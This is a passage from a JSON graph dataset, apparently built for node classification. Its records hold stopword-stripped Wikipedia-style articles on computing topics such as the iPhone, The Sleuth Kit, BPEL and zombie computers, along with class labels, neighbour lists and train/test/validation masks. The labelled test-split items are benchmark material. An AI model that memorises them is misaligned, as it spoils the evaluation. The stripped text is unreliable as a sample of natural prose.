percent – 4.3 percentage points less number iphone 3gs models returned first month phone launch consumer reports noted solution permanent though good first step however jobs specify time line fixing problem offering free bumper temporary solution pc world decided remove iphone 4 top 10 cell phones chart reassign pending rating despite negative media attention regarding antenna issues 72 iphone 4 users say satisfied iphone 4 according august 2010 survey changewave research iphone 4 model continued sold unchanged september 2013 2011 two iphone 4 units equipped special application taken international space station aboard space shuttle sts-135 mission devices used various experiments utilizing sensors special app",
    "neighbors": [
      4609,
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      11289,
      7706,
      1057,
      1576,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      8783,
      5201,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      4225,
      10878,
      8842,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      3790,
      9424,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      9964,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      3882,
      4399,
      11062,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      7496,
      2388,
      3928,
      4957,
      6495,
      9063,
      10602,
      3948,
      11629,
      10608,
      7029,
      2439,
      6023,
      6537,
      6539,
      7052,
      1428,
      3483,
      10658,
      2979,
      9123,
      11173,
      8109,
      446,
      7614,
      5058,
      2502,
      456,
      1482,
      9163,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      7154,
      11257,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 2493,
    "label": 2,
    "text": "Windows_Imaging_Component:windows imaging component windows imaging component wic component object model based imaging codec framework introduced windows vista later available windows xp service pack 3 working processing digital images image metadata allows applications supporting framework automatically get support installed codecs graphics file formats similar directshow acm/vcm extended using image codecs support third-party graphics formats system-wide basis additionally windows presentation foundation applications also automatically support installed image codecs codecs raw image formats used high-end professional digital cameras also supported manner wic enables application developers perform image processing operations image format single set common apis without requiring prior knowledge specific image formats writing codec wic developers get system-wide support graphics file format applications use wic .net 3.x wpf windows imaging component provides extensible architecture image codecs pixel formats metadata automatic run-time discovery new formats supports reading writing arbitrary metadata image files ability preserve unrecognized metadata editing working images preserves high bit depth image data 32 bits per channel throughout revamped high dynamic range image processing pipeline built windows vista windows imaging component supports windows color system icc v4-compliant color management technology windows vista default windows vista ships jpeg tiff gif png bmp hd photo encoders decoders ico decoder additionally 2009 camera manufacturers 3rd-parties released wic codecs proprietary raw image formats enabling mac-like raw image support windows 7 vista july 2011 extended significantly microsoft providing separate codec pack current digital cameras progressive graphics file pgf viewer distributed wic codec wic supports exchangeable image file exif png textual metadata image file directory ifd iptc information interchange model iptc extensible metadata platform xmp formats addition wic includes extensible framework support third-party metadata implementations metadata format support per codec example native jpeg codec supports xmp native gif png codecs wic available windows xp service pack 2 stand-alone downloadable program built windows xp service pack 3 also available part .net framework 3.0 discontinued powertoy windows xp microsoft known photo info allows viewing editing image metadata windows explorer also uses wic starting windows vista windows explorer windows photo gallery based wic thus view organize images format wic codec installed office 2010 later versions core office apps word excel powerpoint outlook import image file formats supported wic starting windows 7 windows media center available windows 7 home premium wic-enabled also gdi+ graphic library built wic although gdi+ load 3rd-party external codecs windows 7 wic stack underwent major overhaul free-threaded built-in external codecs shipping windows free-threaded also requirement new codecs targeting windows 7 microsoft expression design import export capabilities entirely based wic expression media phase one media pro service pack 1 later also supports additional raw camera formats hd photo jpeg xr using wic 2018 third-party imaging applications image editors image organizers image viewers utilize wic fastpictureviewer simple standalone third-party image viewer supports standard image formats along hd photo raw camera formats nrw nef cr2 dng using wic experimental wic import plug-in adobe photoshop also found fastpictureviewer website another wic import plug-in gimp found gimp-forum.net",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      1098,
      4174,
      4178,
      9813,
      603,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      3224,
      4771,
      7846,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      8976,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      7983,
      11570,
      5952,
      1348,
      844,
      10079,
      11616,
      2943,
      9609,
      9612,
      8080,
      9114,
      10654,
      8607,
      11683,
      6584,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 2494,
    "label": 4,
    "text": "The_Sleuth_Kit:sleuth kit sleuth kit tsk library collection unix- windows-based utilities facilitate forensic analysis computer systems written maintained primarily digital investigator brian carrier sleuth kit capable parsing ntfs fat/exfat ufs 1/2 ext2 ext3 ext4 hfs iso 9660 yaffs2 file systems either separately within disk images stored raw dd expert witness aff formats sleuth kit used examine microsoft windows apple macintosh osx many linux unix computers sleuth kit used sleuth kit free open-source suite provides large number specialized command-line based utilities based coroner toolkit official successor platform tools included sleuth kit include",
    "neighbors": [
      645,
      2437,
      8582,
      5512,
      6797,
      2193,
      5010,
      4500,
      2197,
      5397,
      2199,
      8469,
      3099,
      7968,
      6177,
      5284,
      5413,
      5293,
      11182,
      7983,
      10290,
      4789,
      823,
      4408,
      2231,
      8635,
      830,
      7369,
      6475,
      10189,
      4049,
      11221,
      4834,
      5475,
      7525,
      9319,
      8298,
      5492,
      246,
      6263,
      7160,
      11642,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2495,
    "label": 2,
    "text": "Mirror_driver:mirror driver mirror driver display driver virtual device mirrors drawing operations one additional physical display devices video mirroring active time system draws primary video device location inside mirrored area copy draw operation executed mirrored video device real-time windows mirror drivers first introduced 1998 windows 2000 display driver model renamed later xpdm 2006 windows vista microsoft introduced new windows display driver model older drivers still supported vista since older model encompass support features first introduced vista newer features would necessarily disabled older driver active consequence mirror driver designed older model active windows remote assistance windows live mesh use vista disabled desktop window manager windows aero similar situation existed transition windows 7 windows 8 beginning ddk targeted windows 8 mirror drivers fulfill exacting specifications must support specific set functions windows installations come two mirror drivers preinstalled mnmdd used netmeeting rdpdd chained dd used terminal server/remotedesktop services third-party mirror drivers included screen readers jaws window-eyes freedombox monitoring software lanschool remote desktop software timbuktu logmein ultravnc tightvnc radmin remotepc",
    "neighbors": [
      6114,
      4178,
      6972
    ],
    "mask": "None"
  },
  {
    "node_id": 2496,
    "label": 7,
    "text": "SAP_Cloud_Platform:sap cloud platform sap cloud platform platform service developed sap se creating new applications extending existing applications secure cloud computing environment managed sap sap cloud platform integrates data business processes sap cloud platform open platform-as-a-service includes in-memory sap hana database management system connects premises cloud-based systems running sap third-party software relies open standards like java javascript node.js cloud foundry integration options sap cloud platform promoted build extend business applications rapid innovation cycles sap apple inc. partnered develop mobile applications ios using cloud-based software development kits sdks sap cloud platform sap cloud platform based open source technology developed supported partnership suse company also partnership cloud foundry beta offering sap cloud platform enables customers test give feedback functionalities coming cloud foundry initially unveiled sap netweaver cloud belonging sap hana cloud portfolio october 16 2012 cloud platform reintroduced new name sap hana cloud platform may 13 2013 foundation sap cloud products including sap businessobjects cloud adoption sap hana cloud platform increased steadily since platform launch 2012 sap claiming 4000 customers 500 partners adopting sap hana cloud platform february 27 2017 sap hana cloud platform renamed sap cloud platform mobile world congress sap cloud platform contains many services better overview assigned several categories following list contains categories defined sap applications available sap hana app center extend integrate applications customize existing applications extend mobile footprint mobile-first apps sap cloud platform organizations better engage customers empower employees developers build applications running cloud still access data premises clouds sap cloud platform developer edition offers users easy free way explore sap cloud platform capabilities addition 1gb shared sap hana sap cloud platform provides users",
    "neighbors": [
      6018,
      1539,
      8451,
      3462,
      6027,
      4236,
      10893,
      526,
      911,
      272,
      1935,
      8592,
      405,
      2328,
      4377,
      8986,
      10265,
      5662,
      11038,
      5666,
      6307,
      9766,
      39,
      2217,
      6444,
      5677,
      10413,
      8495,
      3121,
      5681,
      9906,
      7352,
      10681,
      11070,
      448,
      4289,
      11201,
      8515,
      10820,
      3269,
      1224,
      4683,
      4429,
      590,
      1102,
      7248,
      5202,
      467,
      9682,
      7512,
      10200,
      5210,
      6618,
      735,
      6367,
      4194,
      11646,
      3428,
      5732,
      6632,
      1001,
      10090,
      2795,
      7660,
      8044,
      2170,
      4604,
      253,
      8446,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 2497,
    "label": 5,
    "text": "Anti-replay:anti-replay anti-replay sub-protocol ipsec part internet engineering task force ietf main goal anti-replay avoid hackers injecting making changes packets travel source destination anti-replay protocol uses unidirectional security association order establish secure connection two nodes network secure connection established anti-replay protocol uses packet sequence numbers defeat replay attacks follows source sends message adds sequence number packet sequence number starts 0 incremented 1 subsequent packet destination maintains 'sliding window record sequence numbers validated received packets rejects packets sequence number lower lowest sliding window i.e old already appears sliding window i.e duplicates/replays accepted packets validated update sliding window displacing lowest sequence number window already full see also replay attack",
    "neighbors": [
      3742,
      8694
    ],
    "mask": "Test"
  },
  {
    "node_id": 2498,
    "label": 3,
    "text": "Nemesis_3:_The_Eve_of_Destruction:nemesis 3 eve destruction four distinct classes vixen chosen first one resembles original vic viper second one twisted version vic viper featuring new photon missile third one like metalion nemesis 2 featuring napalm missile extended fire blaster fourth one like sabel tiger salamander featuring 2-way missile approach ripple laser four classes may choose classic shield force field takes less hits expire protects direction also possible choose behavior option original shadow movement fixed rolling like option warrior nemesis 2 game retains several new weapons introduced nemesis 2 like laser fire blaster vector laser well salamander weapons like meteor laser screw laser game nemesis series visibly keeps track number speed boosts order upgrade ship weapons secret spots must found like secret stages nemesis 2 predictions salamander",
    "neighbors": [
      9005,
      9006,
      10931,
      4405,
      9247
    ],
    "mask": "None"
  },
  {
    "node_id": 2499,
    "label": 9,
    "text": "Persistent_programming_language:persistent programming language programming languages natively seamlessly allow objects continue existing program closed called persistent programming languages jade one language persistent programming language programming language extended constructs handle persistent data distinguished embedded sql least two ways persistent programming language embedded sql using embedded sql programmer responsible writing explicit code fetch data memory store data back database persistent programming language programmer manipulate persistent data without write code explicitly drawbacks persistent programming languages include",
    "neighbors": [
      9467,
      8262
    ],
    "mask": "None"
  },
  {
    "node_id": 2500,
    "label": 3,
    "text": "NLX_(motherboard_form_factor):nlx motherboard form factor nlx new low profile extended form factor proposed intel developed jointly ibm dec vendors low profile low cost mass-marketed retail pcs release 1.2 finalized march 1997 release 1.8 finalized april 1999 nlx similar overall design lpx including riser card low-profile slimline case modernized updated allow support latest technologies keeping costs fixing main problems lpx specified motherboards size officially nlx form factor designed use atx power supplies featured soft power function however nlx cases instead used smaller sfx form factor proprietary form factors 20-pin connector many slimline systems formerly designed fit lpx form factor modified fit nlx nlx true standard unlike lpx making interchangeability components easier older form factor ibm gateway nec produced fair number nlx computers late 1990s primarily socket 370 pentium ii-iii celeron nlx never enjoyed widespread acceptance lpx importantly one largest pc manufacturers dell decided using nlx created proprietary motherboards use slimline systems although many computers motherboards still available secondhand new production essentially ceased slimline small form factor market nlx superseded micro-atx flexatx mini-itx form factors",
    "neighbors": [
      10337,
      10468,
      455,
      7113,
      9307,
      10095,
      2161,
      2803,
      10715,
      1400,
      8730,
      3323,
      3037
    ],
    "mask": "Test"
  },
  {
    "node_id": 2501,
    "label": 8,
    "text": "Business_Process_Execution_Language:business process execution language web services business process execution language ws-bpel commonly known bpel business process execution language oasis standard executable language specifying actions within business processes web services processes bpel export import information using web service interfaces exclusively one describe web-service interactions two ways executable business processes abstract business processes ws-bpel aims model behavior processes via language specification executable abstract business processes extends web services interaction model enables support business transactions also defines interoperable integration model facilitate expansion automated process integration within businesses development came notion programming large programming small required different types languages serialized xml aims enable programming large concepts programming large programming small distinguish two aspects writing type long-running asynchronous processes one typically sees business processes origins ws-bpel go back web services flow language wsfl xlang 2001 ibm microsoft defined fairly similar programming large languages wsfl web services flow language xlang respectively microsoft even went ahead created scripting variant called xlang/s would later serve basis orchestrations services inside biztalk server specifically documented language proprietary fully documented advent popularity bpml growing success bpmi.org open bpms movement led jboss intalio inc. ibm microsoft decided combine languages new language bpel4ws april 2003 bea systems ibm microsoft sap siebel systems submitted bpel4ws 1.1 oasis standardization via web services bpel technical committee although bpel4ws appeared 1.0 1.1 version oasis ws-bpel technical committee voted 14 september 2004 name spec ws-bpel 2.0 change name aligned bpel web service standard naming conventions start ws- similar ws-security took account significant enhancements made bpel4ws 1.1 ws-bpel 2.0 discussing specific version moniker bpel commonly used june 2007 active endpoints adobe systems bea ibm oracle sap published bpel4people ws-humantask specifications describe human interaction bpel processes implemented ten original design goals associated bpel bpel orchestration language choreography language primary difference orchestration choreography executability control orchestration specifies executable process involves message exchanges systems message exchange sequences controlled orchestration designer choreography specifies protocol peer-to-peer interactions defining e.g. legal sequences messages exchanged purpose guaranteeing interoperability protocol directly executable allows many different realizations processes comply choreography realized writing orchestration e.g. form bpel process peer involved orchestration choreography distinctions based analogies orchestration refers central control conductor behavior distributed system orchestra consisting many players choreography refers distributed system dancing team operates according rules choreography without centralized control bpel focus modern business processes plus histories wsfl xlang led bpel adopt web services external communication mechanism thus bpel messaging facilities depend use web services description language wsdl 1.1 describe outgoing incoming messages addition providing facilities enable sending receiving messages bpel programming language also supports standard graphical notation ws-bpel oasis technical committee decided scope vendors invented notations notations take advantage fact constructs bpel block-structured e.g. sequence pick scope etcetera feature enables direct visual representation bpel process descriptions form structograms style reminiscent nassi–shneiderman diagram others proposed use substantially different business process modeling language namely business process model notation bpmn graphical front-end capture bpel process descriptions illustration feasibility approach bpmn specification includes informal partial mapping bpmn bpel 1.1 detailed mapping bpmn bpel implemented number tools including open-source tool known bpmn2bpel however development tools exposed fundamental differences bpmn bpel make difficult cases impossible generate human-readable bpel code bpmn models even difficult problem bpmn-to-bpel round-trip engineering generating bpel code bpmn diagrams maintaining original bpmn model generated bpel code synchronized sense modification one propagated bpel control structures 'if-then-elseif-else 'while well variable manipulation facilities depend use 'programming small languages provide logic bpel implementations must support xpath 1.0 default language design bpel envisages extensibility systems builders use languages well bpelj effort related jsr 207 may enable java function 'programming small language within bpel despite wide acceptance web services distributed business applications absence human interactions significant gap many real-world business processes fill gap bpel4people extended bpel orchestration web services alone orchestration role-based human activities well within context business process bpel4people extending bpel additional independent syntax semantic ws-humantask specification introduces definition human tasks notifications including properties behavior set operations used manipulate human tasks coordination protocol introduced order control autonomy life cycle service-enabled human tasks interoperable manner bpel4people specification introduces ws-bpel extension address human interactions ws-bpel first-class citizen defines new type basic activity uses human tasks implementation allows specifying tasks local process use tasks defined outside process definition extension based ws-humantask specification version 2.0 introduced changes new features",
    "neighbors": [
      2432,
      8070,
      5768,
      4107,
      8203,
      10510,
      1041,
      7320,
      2585,
      6811,
      9629,
      7198,
      5283,
      10020,
      425,
      8626,
      8627,
      10553,
      8766,
      6079,
      1347,
      5059,
      7753,
      11339,
      10829,
      2901,
      5210,
      1756,
      2013,
      222,
      1250,
      4979,
      6007,
      4088,
      3323,
      10236,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 2502,
    "label": 2,
    "text": "IPhone_(1st_generation):iphone 1st generation iphone colloquially known iphone 2g iphone 1 2008 differentiate later models first smartphone designed marketed apple inc. years rumors speculation officially announced january 9 2007 later released united states june 29 2007 featured quad-band gsm cellular connectivity gprs edge support data transfer development iphone dated back 2005 former apple ceo steve jobs conceived idea design expanded upon next 2 years complete secrecy announced q1 2007 although several aspects iphone considered obsolete current standards device seen archetype current cell phones eliminating physical hardware buttons stylus favor touch-based user interface successor iphone 3g announced june 2008 2005 apple ceo steve jobs conceived idea using touchscreen interact computer way could directly type onto display instead requiring stylus common existing technology time decided device would require triple layered capacitive multi-touch touch screen new advanced technology time helped removing physical keyboard mouse tablet computer jobs recruited group apple engineers investigate idea side project jobs reviewed prototype user interface saw potential developing concept mobile phone whole effort called project purple 2 began 2005 apple created device secretive unprecedented collaboration cingular wireless mobility development cost collaboration estimated 150 million thirty-month period apple rejected design committee approach yielded motorola rokr e1 largely unsuccessful collaboration motorola instead cingular wireless gave apple liberty develop iphone hardware software in-house original iphone introduced steve jobs january 9 2007 keynote address macworld conference expo held moscone west san francisco california address jobs said day looking forward two half years today apple going reinvent phone jobs introduced iphone combination three devices widescreen ipod touch controls revolutionary mobile phone breakthrough internet communicator six weeks iphone released plastic screen replaced glass one jobs upset screen prototype carrying pocket scratched keys quick switch led bidding process manufacturing contractor foxconn opened new wing shenzhen factory complex specifically bid february 2007 lg electronics accused apple copying lg prada phone similar hardware functionality announced several weeks iphone iphone released united states june 29 2007 price 499 4 gb model 599 8 gb model requiring 2-year contract thousands people reported waited outside apple retail stores days device launch many stores reported stock shortages within hour availability avoid repeating problems playstation 3 launch caused burglaries even shooting off-duty police officers hired guard stores overnight later made available united kingdom france germany portugal republic ireland austria november 2007 six ten americans surveyed said knew iphone coming release iphone main competitors consumer business markets considered lg prada lg viewty samsung ultra smart f700 nokia n95 nokia e61i palm treo 750 palm centro htc touch sony ericsson w960 blackberry ipod touch touchscreen device media internet abilities interface iphone without ability connect cellular network phone functions internet access released september 5 2007 time apple significantly dropped price 8 gb model 599 399 still requiring 2-year contract discontinuing 4 gb model apple sold one millionth iphone five days later 74 days release receiving hundreds emails ... upset price drop apple gave store credit early adopters 16 gb model released february 5 2008 499 original launch price 4 gb model apple released sdk march 6 2008 allowing developers create apps would available starting iphone os version 2.0 free upgrade iphone users june 9 apple announced iphone 3g began shipping july 11 original iphone discontinued july 15 total sales volume came 6,124,000 units release iphone marketed running os x name operating system revealed iphone os release iphone sdk original iphone supported three major versions operating system discontinued iphone os 1 2 3 however full iphone os 3 feature set supported last update original iphone received iphone os 3.1.3 original operating system original iphone iphone os 1 marketed os x included visual voicemail multi-touch gestures html email safari web browser threaded text messaging youtube however many features like mms apps copy paste supported release leading hackers jailbreaking phones add features official software updates slowly added features iphone os 2 released july 11 2008 time release iphone 3g introduced third-party applications microsoft exchange support push e-mail enhancements iphone os 3 released june 17 2009 introduced copy paste functionality spotlight search home screen new features youtube app iphone os 3 available original iphone well iphone 3g however features iphone os 3 supported original iphone iphone os 3.1.3 last version iphone os ios released original iphone four writers given review models original iphone david pogue new york times walt mossberg wall street journal steven levy newsweek ed baig usa today new york times wall street journal published positive cautious reviews iphone primary criticisms relatively slow speed 2.5g edge network phone inability connect using 3g services wall street journal technology columnist walt mossberg concluded despite flaws feature omissions iphone balance beautiful breakthrough handheld computer time magazine named invention year 2007 mobile gazette reported whilst iphone many impressive points equally many bad ones noting lack 3g mms third-party applications weak camera without autofocus flash",
    "neighbors": [
      4609,
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      11289,
      7706,
      1057,
      1576,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      8842,
      5784,
      1177,
      4251,
      3228,
      2207,
      2208,
      4258,
      7842,
      11430,
      171,
      2735,
      3248,
      9391,
      4283,
      3772,
      7869,
      3790,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      9964,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      9518,
      4399,
      7991,
      1849,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      7496,
      2388,
      3928,
      4957,
      6495,
      9063,
      10602,
      3948,
      11629,
      10608,
      2439,
      6023,
      6537,
      11655,
      6539,
      7052,
      1428,
      3483,
      10658,
      2979,
      9123,
      11173,
      424,
      8109,
      2492,
      446,
      7614,
      5058,
      456,
      1482,
      9163,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      7154,
      11257,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 2503,
    "label": 3,
    "text": "KOMDIV-32:komdiv-32 komdiv-32 family 32-bit microprocessors developed manufactured scientific research institute system development niisi russian academy sciences manufacturing plant niisi located dubna grounds kurchatov institute komdiv-32 processors intended primarily spacecraft applications many radiation hardened rad-hard microprocessors compatible mips r3000 integrated mips r3010 compatible floating-point unit",
    "neighbors": [
      9857,
      6659,
      9861,
      7687,
      1425,
      6033,
      4386,
      426,
      6957,
      8625,
      1461,
      2490,
      11580,
      6207,
      5825,
      7234,
      2523,
      9309,
      5348,
      6250,
      5358,
      1776,
      499,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 2504,
    "label": 7,
    "text": "Online_SAS:online sas online sas also known online.net french cloud computing web hosting company founded xavier niel 1999 100 subsidiary iliad group company provides physical dedicated servers cloud computing architectures dedibox scaleway brands domain registration services bookmyname brand colocation services datacenters brand iliad datacenter company second player france gb/s internet traffic 1999 online started activities web hosting domain name registration services august 2002 domain name registrar bookmyname bought iliad concurrent ldcom may 2006 rental dedicated servers dedibox brand launched december 2008 iliad bought alice adsl also took construction operation datacenters launched 1999 isdnet bought cable wireless january 2000 acquired tiscali france june 2003 finally renamed iliad datacenter april 2010 online merges dedibox another subsidiary iliad bringing together different hosting activities single brand 2012 company opened third datacenter 11800 m² vitry-sur-seine 11 months construction works site received first tier-iii certification france uptime institute january 2014 since 2012 company publishes real time pue datacenters pue.online.net effort transparency 2013 online launched labs.online.net preview infrastructure service offer based dedicated hardware without virtualization based arm cpus hardware made factory near laval france april 2015 service left beta status renamed scaleway popularity platform grows online added servers x86_64 based cpus march 2016 online owns operates several data centers located île-de-france region past company operated also since august 2013 network online as12876 online s.a.s independent one free case allowed company move away closed interconnection policy internet service provider early 2015 company announced exceeded gb/s immediate internet traffic may 2016 online shows total gb/s capacity links weathermap present following internet exchange points france-ix equinix-ix ams-ix et neutral internet exchange",
    "neighbors": [
      2720,
      225,
      1410,
      4194,
      8865,
      7078,
      2795,
      5356,
      4429,
      9964,
      1650
    ],
    "mask": "Train"
  },
  {
    "node_id": 2505,
    "label": 9,
    "text": "Curry_(programming_language):curry programming language curry experimental functional logic programming language based haskell language merges elements functional logic programming including constraint programming integration nearly superset haskell lacking support mostly overloading using type classes implementations provide anyway language extension münster curry compiler functional program set functions defined equations rules functional computation consists replacing subexpressions equal regards function definitions subexpressions replacements reductions possible value normal form obtained instance consider function double defined expression “ ” replaced latter replaced interpret operator “ ” defined infinite set equations e.g. etc similar way one evaluate nested expressions subexpressions replaced quoted also another order evaluation replace arguments operators right left case derivations lead result property known confluence follows fundamental property pure functional languages termed referential transparency value computed result depend order time evaluation due absence side effects simplifies reasoning maintenance pure functional programs many functional languages like haskell curry supports definition algebraic data types enumerating constructors instance type boolean values consists constructors declared follows functions booleans defined pattern matching i.e. providing several equations different argument values principle replacing equals equals still valid provided actual arguments required form e.g complex data structures obtained recursive data types instance list elements type elements arbitrary denoted type variable either empty list “ ” non-empty list “ ” consisting first element list type “ ” usually written finite lists x1x2 ... xn written x1x2 ... xn define operations recursive types inductive definitions pattern matching supports convenient separation different cases instance concatenation operation “ ” polymorphic lists defined follows optional type declaration first line specifies “ ” takes two lists input produces output list list elements unspecified type beyond application various programming tasks operation “ ” also useful specify behavior functions lists instance behavior function last yields last element list specified follows lists xs elements e xs e ∃ysyse xs based specification one define function satisfies specification employing logic programming features similarly logic languages functional logic languages provide search solutions existentially quantified variables contrast pure logic languages support equation solving nested functional expressions equation like yse solved instantiating ys list e value curry one define operation last follows symbol “ ” used equational constraints order provide syntactic distinction defining equations similarly extra variables i.e. variables occurring left-hand side defining equation explicitly declared “ ” order provide opportunities detect bugs caused typos conditional equation form l c r applicable reduction condition c solved contrast purely functional languages conditions evaluated boolean value functional logic languages support solving conditions guessing values unknowns condition narrowing discussed next section used solve kind conditions narrowing mechanism whereby variable bound value selected among alternatives imposed constraints possible value tried order remainder program invoked case determine validity binding narrowing extension logic programming performs similar search actually generate values part search rather limited testing narrowing useful allows function treated relation value computed directions curry examples previous section illustrate noted previous section narrowing thought reduction program term graph often many different ways strategies reduce given term graph antoy et al proved 1990s particular narrowing strategy needed narrowing optimal sense number reductions get normal form corresponding solution minimal among sound complete strategies needed narrowing corresponds lazy strategy contrast sld-resolution strategy prolog rule defining shown expresses fact actual argument must match result narrowing expression curry express property also following concise way haskell allow declaration since pattern left-hand side contains defined function pattern also called functional pattern functional patterns enabled combined functional logic features curry support concise definitions tasks requiring deep pattern matching hierarchical data structures since curry able solve equations containing function calls unknown values execution mechanism based non-deterministic computations similarly logic programming mechanism supports also definition non-deterministic operations i.e. operations delivers one result given input archetype non-deterministic operations predefined infix operation called choice operator returns one arguments operator defined following rules thus evaluation expression returns well computing non-deterministic operations computing free variables narrowing expressive power rules defining show important feature curry rules tried order evaluate operation hence one define operation insert element list indeterminate position operation defined returns permutation given input list due absence side effects functional logic program executed different strategies evaluate expressions curry uses variant needed narrowing strategy combines lazy evaluation non-deterministic search strategies contrast prolog uses backtracking search solutions curry fix particular search strategy hence implementations curry like kics2 user easily select search strategy like depth-first search backtracking breadth-first search iterative deepening parallel search",
    "neighbors": [
      10011,
      9345,
      10819,
      3876,
      8421,
      8775,
      6536,
      9224,
      11625,
      8973,
      7983,
      5651,
      11574,
      219,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2506,
    "label": 3,
    "text": "List_of_former_IA-32_compatible_processor_manufacturers:list former ia-32 compatible processor manufacturers 32-bit intel architecture became dominant computing platform 1980s 1990s multiple companies tried build microprocessors compatible intel instruction set architecture companies successful mainstream computing market far amd market presence computing market couple product generations cyrix successful 386 486 generations products well pentium introduced list former ia-32 compatible microprocessor vendors",
    "neighbors": [
      7008,
      8355,
      5380,
      3883,
      9932,
      11405,
      3123,
      499,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 2507,
    "label": 2,
    "text": "Commercial_Operating_System_(COS):commercial operating system cos cos-3xx commercial operating system name used digital equipment corporation family operating systems supported use dibol programming language combining features basic fortran cobol cos also supported rpg report program generator commercial operating system implemented run hardware pdp-8 pdp-11 family cos-310 developed pdp-8 provide operating environment dibol cos-310 system purchased package included desk vt-52 vdt video display tube pair eight inch floppy drives optionally could purchase one 2.5 mb hard drives removable media cos-310 one operating systems available decmate ii unlike tss-8 user 4k virtual machine cos user virtual 32k cos-350 developed support pdp-11 port dibol focus vendors turnkey software packages pre-cos-350 pdp 11/05 single-user batch-oriented implementation released multi-user pdp 11/10-based cos came 4 years later much powerful pdp-11/34 added significant configuration flexibility expansion capability",
    "neighbors": [
      3650,
      7076,
      1253,
      10475,
      1804,
      8876,
      7983,
      6448,
      273,
      6837,
      8732,
      10590,
      9759
    ],
    "mask": "Test"
  },
  {
    "node_id": 2508,
    "label": 4,
    "text": "Zombie_(computing):zombie computing computing zombie computer connected internet compromised hacker computer virus trojan horse program used perform malicious tasks one sort another remote direction botnets zombie computers often used spread e-mail spam launch denial-of-service attacks dos attacks owners zombie computers unaware system used way owner tends unaware computers metaphorically compared fictional zombies coordinated ddos attack multiple botnet machines also resembles zombie horde attack depicted fictional zombie films zombie computers used extensively send e-mail spam 2005 estimated 50–80 spam worldwide sent zombie computers allows spammers avoid detection presumably reduces bandwidth costs since owners zombies pay bandwidth spam also greatly furthers spread trojan horses trojans self-replicating rely movement e-mails spam grow whereas worms spread means similar reasons zombies also used commit click fraud sites displaying pay-per-click advertising others host phishing money mule recruiting websites zombies used conduct distributed denial-of-service ddos attacks term refers orchestrated flooding target websites large numbers computers large number internet users making simultaneous requests website server intended result crashing prevention legitimate users accessing site variant type flooding known distributed degradation-of-service committed pulsing zombies distributed degradation-of-service moderated periodical flooding websites done intent slowing rather crashing victim site effectiveness tactic springs fact intense flooding quickly detected remedied pulsing zombie attacks resulting slow-down website access go unnoticed months even years notable incidents distributed denial- degradation-of-service attacks past include attack upon spews service 2003 one blue frog service 2006 2000 several prominent web sites yahoo ebay etc clogged standstill distributed denial service attack mounted ‘ mafiaboy ’ canadian teenager attack grc.com discussed length perpetrator 13-year-old probably sardis mississippi identified gibson research web site steve gibson disassembled 'bot zombie used attack traced distributor account research describes operation 'bot'-controlling irc channel beginning july 2009 similar botnet capabilities also emerged growing smartphone market examples include july 2009 wild release sexy space text message worm world first botnet capable sms worm targeted symbian operating system nokia smartphones later month researcher charlie miller revealed proof concept text message worm iphone black hat briefings also july united arab emirates consumers targeted etisalat blackberry spyware program 2010s security community divided real world potential mobile botnets august 2009 interview new york times cyber security consultant michael gregg summarized issue way point smart phones desktops '80s",
    "neighbors": [
      3072,
      9732,
      10245,
      10756,
      9227,
      9233,
      9242,
      9761,
      9256,
      9771,
      10297,
      1083,
      3643,
      7739,
      9791,
      1088,
      2114,
      4165,
      8789,
      107,
      10875,
      5245,
      2175,
      6786,
      5764,
      9356,
      1681,
      4245,
      10392,
      1690,
      5281,
      2213,
      1200,
      8387,
      10952,
      4314,
      6368,
      2275,
      10477,
      4344,
      3320,
      4863,
      1279,
      4356,
      7441,
      8978,
      4883,
      278,
      3867,
      8998,
      2857,
      11051,
      300,
      1337,
      11583,
      9536,
      3395,
      7515,
      4956,
      1892,
      3941,
      11621,
      2409,
      877,
      4462,
      9591,
      7044,
      901,
      1925,
      9102,
      10141,
      9630,
      939,
      1970,
      4023,
      1979,
      6588,
      9664,
      9154,
      3032,
      988,
      9187,
      2041,
      3581,
      2558,
      9727
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2509,
    "label": 5,
